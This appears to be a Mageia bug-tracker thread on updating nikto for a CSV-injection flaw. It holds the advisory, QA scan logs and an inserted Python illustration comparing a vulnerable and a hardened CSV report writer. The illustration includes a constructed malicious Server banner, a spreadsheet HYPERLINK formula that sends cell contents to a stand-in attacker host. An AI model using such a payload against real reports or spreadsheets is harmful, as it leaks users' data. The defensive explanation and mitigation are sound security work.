Fedora has issued an advisory today (June 20): https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WP2HP7GAFORSGSAPANE4VPDGGYJT5Q3B/
Mageia 5 and Mageia 6 are also affected.
Status comment: (none) => Patches available from upstream and Fedora
Whiteboard: (none) => MGA6TOO
Assigning to the registered maintainer.
Assignee: bugsquad => guillomovitch
CC: (none) => marja11
Cauldron: fixed
Mageia 6: nikto-2.1.5-9.1.mga6 uploaded in update_testing
Mageia 5: EOL
Suggested advisory: This release fixes the CVE-2018-11652 vulnerability (CSV injection via the Server field in an HTTP response header).
Assignee: guillomovitch => qa-bugs
CC: (none) => tmb
Whiteboard: MGA6TOO => (none)
Version: Cauldron => 6
Thanks Guillaume!

Advisory:
========================

Updated nikto package fixes security vulnerability:

CSV Injection vulnerability in Nikto 2.1.6 and earlier allows remote attackers to inject arbitrary OS commands via the Server field in an HTTP response header, which is directly injected into a CSV report (CVE-2018-11652).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11652
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WP2HP7GAFORSGSAPANE4VPDGGYJT5Q3B/
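The advisory above describes the vulnerability class in one sentence: a scanned server's Server banner is copied unmodified into a CSV report, so a banner beginning with a formula character becomes a live spreadsheet formula when the report is opened, and embedded separators can reshape the row. The following is an added illustration of that class and of the usual mitigation (quote every field, and neutralize a leading formula trigger). It is not nikto's code (nikto is written in Perl), not the exploit-db PoC, and the hostnames, addresses and the hostile Server value are constructed for the example.

```python
"""Constructed example: CSV injection via an attacker-controlled HTTP Server
header written into a scanner's CSV report, beside a hardened writer.
This is illustrative code, not nikto's own report writer."""
import csv
import io

# Leading characters that make spreadsheet software evaluate a cell as a
# formula (plus TAB/CR, which some importers treat as field/record breaks).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample scan results: a benign banner and a hostile banner that
# is both a spreadsheet formula and carries a comma and quotes to spill
# into extra columns.  Hostnames and addresses are made up (RFC 2606/5737).
RESPONSES = [
    {"host": "www.example.test", "ip": "192.0.2.10", "port": 80,
     "server": "gws"},
    {"host": "evil.example.test", "ip": "192.0.2.66", "port": 80,
     "server": '=HYPERLINK("http://attacker.test/?"&A1,"click"),"x"'},
]


def naive_csv_row(r: dict) -> str:
    """Vulnerable pattern: the attacker-controlled banner is concatenated
    into the line untouched, so '=' starts a formula and ',' / '"' break
    the row layout."""
    return f'{r["host"]},{r["ip"]},{r["port"]},{r["server"]}\n'


def neutralize(value: str) -> str:
    """Prefix a leading formula trigger with a single quote so spreadsheet
    software reads the cell as text (the common CSV-injection mitigation)."""
    if value.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def safe_csv_report(responses) -> str:
    """Hardened writer: neutralize formula triggers, then let the csv module
    quote every field so separators and quotes cannot change the row shape."""
    buf = io.StringIO()
    w = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    w.writerow(["host", "ip", "port", "server"])
    for r in responses:
        w.writerow([r["host"], r["ip"], str(r["port"]),
                    neutralize(r["server"])])
    return buf.getvalue()


def row_is_safe(row: list) -> bool:
    """True when no cell in a parsed row begins with a formula trigger."""
    return not any(cell.startswith(FORMULA_TRIGGERS) for cell in row)


def audit_report(text: str) -> bool:
    """Parse a finished report and confirm every row has exactly 4 cells
    and no cell would be evaluated as a formula."""
    rows = list(csv.reader(io.StringIO(text)))
    return all(len(row) == 4 and row_is_safe(row) for row in rows)


if __name__ == "__main__":
    bad = "".join(naive_csv_row(r) for r in RESPONSES)
    print(bad)
    print("naive report passes audit:", audit_report(bad))
    good = safe_csv_report(RESPONSES)
    print(good)
    print("hardened report passes audit:", audit_report(good))
```

`audit_report` is the check a tester can run over any CSV a scanner produced: it parses the file the way a spreadsheet importer would and flags both a spilled column count and a cell that starts with a formula trigger. Quoting alone is not sufficient, since a quoted cell that begins with `=` is still evaluated by most spreadsheet software once the quotes are stripped on import; that is why the leading-character neutralization is applied in addition to `QUOTE_ALL`.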
MGA6-32 on IBM Thinkpad R50e MATE
No installation issues for nikto-2.1.5-9.1.mga6.
At CLI:
$ nikto -host www.google.com
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 172.217.19.196
+ Target Hostname: www.google.com
+ Target Port: 80
+ Start Time: 2018-07-02 16:59:00 (GMT2)
---------------------------------------------------------------------------
+ Server: gws
+ Cookie 1P_JAR created without the httponly flag
+ Cookie NID created without the httponly flag
+ Uncommon header 'x-xss-protection' found, with contents: 1; mode=block
+ Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ Uncommon header 'referrer-policy' found, with contents: no-referrer
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server banner has changed from 'gws' to 'sffe' which may suggest a WAF, load balancer or proxy is in place
+ Uncommon header 'x-content-type-options' found, with contents: nosniff
+ File/dir '/search/about/' in robots.txt returned a non-forbidden or redirect HTTP code (301)
and loads more. Not sure what it all means, but looks sensible.
CC: (none) => herman.viaene
Whiteboard: (none) => MGA6-32-OK
Mageia 6, x86_64
Thanks Herman for taking the lead.
Had a look at the PoC at https://www.exploit-db.com/exploits/44899/ which involved installing nginx and nginx-extras. Hit a dead-end there with the extras package and the /etc/nginx/ configuration files appeared to be incomplete. Gave up on trying to inject a command string into a CSV document by scanning the nginx server with nikto.
Updated the package and used the command from comment 5.
$ nikto -host www.google.com
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 209.85.202.99
+ Target Hostname: www.google.com
+ Target Port: 80
+ Start Time: 2018-07-04 23:51:50 (GMT1)
---------------------------------------------------------------------------
+ Server: gws
+ Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ Uncommon header 'x-xss-protection' found, with contents: 1; mode=block
+ Cookie 1P_JAR created without the httponly flag
+ Cookie NID created without the httponly flag
[....]
+ "robots.txt" contains 271 entries which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD
This is similar to the output in comment 5. Looks OK for 64 bits, or to put it another way:
Gort: Klaatu barada nikto
CC: (none) => tarazed25
Whiteboard: MGA6-32-OK => MGA6-32-OK MGA6-64-OK
Keywords: (none) => validated_update
CC: (none) => sysadmin-bugs
CC: (none) => davidwhodgins
Keywords: (none) => advisory
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2018-0310.html
Resolution: (none) => FIXED
Status: NEW => RESOLVED